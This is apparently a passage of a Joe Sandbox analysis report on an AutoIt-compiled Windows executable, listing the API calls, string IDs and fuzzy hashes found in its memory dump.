                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94118C71904118ABEB205FA4EC54EEB3BAAEB153B8F104714F965931E0C7B5DC51BB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F052D5
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F052F4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 5117e5871758fa0921d0497efe0e3e6daf14797cb335a1134ac169ab99956d08
                                                                                                                                                                                                                                                      • Instruction ID: f0124da8d9fd429399828b6987316d2a04a01284d91aa5e6549b3af607cafe45
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5117e5871758fa0921d0497efe0e3e6daf14797cb335a1134ac169ab99956d08
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE11D072D01618EBEB20DA98DD05BAE77B9AB05B60F140125E901E72D0D3F0AD09FF90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F14DF5
                                                                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F14E1E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                      • String ID: <local>
                                                                                                                                                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                      • Opcode ID: e7f6f5fa8e72b71c10bd4e934e12d095f03a03551aed87768d42e2c298856cb4
                                                                                                                                                                                                                                                      • Instruction ID: 947c6b940d99a42ab9f84644b0fd4333ad1cd5eb8ba4c235cdfd3bf4f458c427
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7f6f5fa8e72b71c10bd4e934e12d095f03a03551aed87768d42e2c298856cb4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F211A071A01225BBDF298F61D888FFBFAA8FF56765F10822AF50556180D3706981E6E0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • inet_addr.WSOCK32(00000000), ref: 00F1A84E
                                                                                                                                                                                                                                                      • htons.WSOCK32(00000000), ref: 00F1A88B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: htonsinet_addr
                                                                                                                                                                                                                                                      • String ID: 255.255.255.255
                                                                                                                                                                                                                                                      • API String ID: 3832099526-2422070025
                                                                                                                                                                                                                                                      • Opcode ID: 8f8509941a1459d6ed142f698b20b0c1c7cd85cc64b2ceb63b550263d231ae41
                                                                                                                                                                                                                                                      • Instruction ID: 9e198a99fcdc25a1f657d7db75cc1422107e0a878140b8cd40f30798c2b9435a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f8509941a1459d6ed142f698b20b0c1c7cd85cc64b2ceb63b550263d231ae41
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C01F975600309ABCB109FA4C856FEDB364EF45330F208526F515A73D1D775E845E752
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EFB7EF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 3850602802-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: 9d82e7220042eab2515f65231c5fcc4422539946a6d3ce22308c0c4a1f437473
                                                                                                                                                                                                                                                      • Instruction ID: cc748a3573c38cb689b53ae98b61121e76145524ab8496919b1c9196432e1bb3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d82e7220042eab2515f65231c5fcc4422539946a6d3ce22308c0c4a1f437473
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B012471600118AFCB04FBA4CC52EFE33A9BF46350B14161DF566B32C2EF7158099791
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00EFB6EB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 3850602802-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: 8f9a13cf27acaf71750e2060565a31399216e770b141d4dd0b0b096648fb8d88
                                                                                                                                                                                                                                                      • Instruction ID: 2b3e83868a78ba625e9b87519b247a19ff35bada35acc8a047785903357544f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f9a13cf27acaf71750e2060565a31399216e770b141d4dd0b0b096648fb8d88
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A701A2B1641008AFDB04EBA4CA52FFE73E99F06344F24101DF606B3282EF559E1997B6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00EFB76C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 3850602802-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: 8b49426cf8a4b59d20f84021fd6f3f19e4513272a2605169ee25ea34660923ce
                                                                                                                                                                                                                                                      • Instruction ID: 264778ba1f1609242e9ea2fd58aae025fec47fdfdad70cb7207a9d03bce708e2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b49426cf8a4b59d20f84021fd6f3f19e4513272a2605169ee25ea34660923ce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 100126B5640008ABCB00FBA4CA02FFE73ED9B05304F64101EF505B32D2DB659E0A97B2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadImageW.USER32(00EC0000,00000063,00000001,00000010,00000010,00000000), ref: 00EC4048
                                                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(00000000,0000000E,00F067E9,00000063,00000000,75C10280,?,?,00EC3EE1,?,?,000000FF), ref: 00F341B3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: EnumImageLoadNamesResource
                                                                                                                                                                                                                                                      • String ID: >
                                                                                                                                                                                                                                                      • API String ID: 1578290342-260571596
                                                                                                                                                                                                                                                      • Opcode ID: 077a2e0c533f7af7c5289df4c55b00dbb9144db76f0df65856f444e687e4bb00
                                                                                                                                                                                                                                                      • Instruction ID: 69e82ed7d4f950c6ecbd9e131cc5261cb79a703661d6d0c3cc72f87d5dfb9e77
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 077a2e0c533f7af7c5289df4c55b00dbb9144db76f0df65856f444e687e4bb00
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32F09075640318B7E6204B1ABC4AFE23AADF715FB5F10020AF714EA1D0D2F19482FB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClassName_wcscmp
                                                                                                                                                                                                                                                      • String ID: #32770
                                                                                                                                                                                                                                                      • API String ID: 2292705959-463685578
                                                                                                                                                                                                                                                      • Opcode ID: f938c34e4bd962240e40ffd93c2152af889f7343371882f6d6de12840ce76c79
                                                                                                                                                                                                                                                      • Instruction ID: e0bccafb3bc57b5b49d674d6af6b830746452d434524c1ec85d69133fdae0132
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f938c34e4bd962240e40ffd93c2152af889f7343371882f6d6de12840ce76c79
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26E0D877A0432827DB10EAE5DC09ED7FFACEB51B60F010056F905E3181D670E64597D0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EFA63F
                                                                                                                                                                                                                                                        • Part of subcall function 00EE13F1: _doexit.LIBCMT ref: 00EE13FB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message_doexit
                                                                                                                                                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                                                                                                                                                      • Opcode ID: 3adc532b41c8b9abf63be7c3643f7dfffc3190b0d12ceb15db436cc6773d5428
                                                                                                                                                                                                                                                      • Instruction ID: ab0c4fd518c0d57af3f513f0f8b988b56dc4b85c10d010e33f0e20c15c1bb4ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3adc532b41c8b9abf63be7c3643f7dfffc3190b0d12ceb15db436cc6773d5428
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99D0C23238035C32C21036986C07FC475888B15B52F090026BB0CA96C249E2D98111DA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00F3ACC0
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F3AEBD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DirectoryFreeLibrarySystem
                                                                                                                                                                                                                                                      • String ID: WIN_XPe
                                                                                                                                                                                                                                                      • API String ID: 510247158-3257408948
                                                                                                                                                                                                                                                      • Opcode ID: 14d186ddf0b6efc38c92bb6388171640fcdba9d7213b6beda26a6d06d83419ad
                                                                                                                                                                                                                                                      • Instruction ID: da701c1c75db05f4e7ed8296d1072ac06464786de37094520b7dced14bdf82d3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14d186ddf0b6efc38c92bb6388171640fcdba9d7213b6beda26a6d06d83419ad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47E06D71C04509DFCB11DBA6DD44AECB7B8AB98350F10A086E852B2260CB709A85FF22
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F286E2
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000), ref: 00F286E9
                                                                                                                                                                                                                                                        • Part of subcall function 00F07A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F07AD0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                      • Opcode ID: 994d3adc6b776d7f5ad6c792d70885d40e12e0d2812474e4d29c24448489802c
                                                                                                                                                                                                                                                      • Instruction ID: 8626a71a44977bd0e86b13b56dbd8a57bf738501905947fd2bb404cc85c93d48
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 994d3adc6b776d7f5ad6c792d70885d40e12e0d2812474e4d29c24448489802c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26D022323C03187BF22473309C0BFC63A089B16B10F000805BB49EA0D0C8E8F900E715
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F286A2
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F286B5
                                                                                                                                                                                                                                                        • Part of subcall function 00F07A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F07AD0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                      • Opcode ID: cc363a904462feb453188702e3c87a12ac96556a2960e02107831070e3cf7c1a
                                                                                                                                                                                                                                                      • Instruction ID: b6fb4fc34b92f63c2a60dcb31f5700bceecbf6979c10cffcde33092d4af7d0a1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc363a904462feb453188702e3c87a12ac96556a2960e02107831070e3cf7c1a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EDD02236384318B7F22473309C0BFC63A089B11B10F000805BB4DAA0D0C8E8E900E710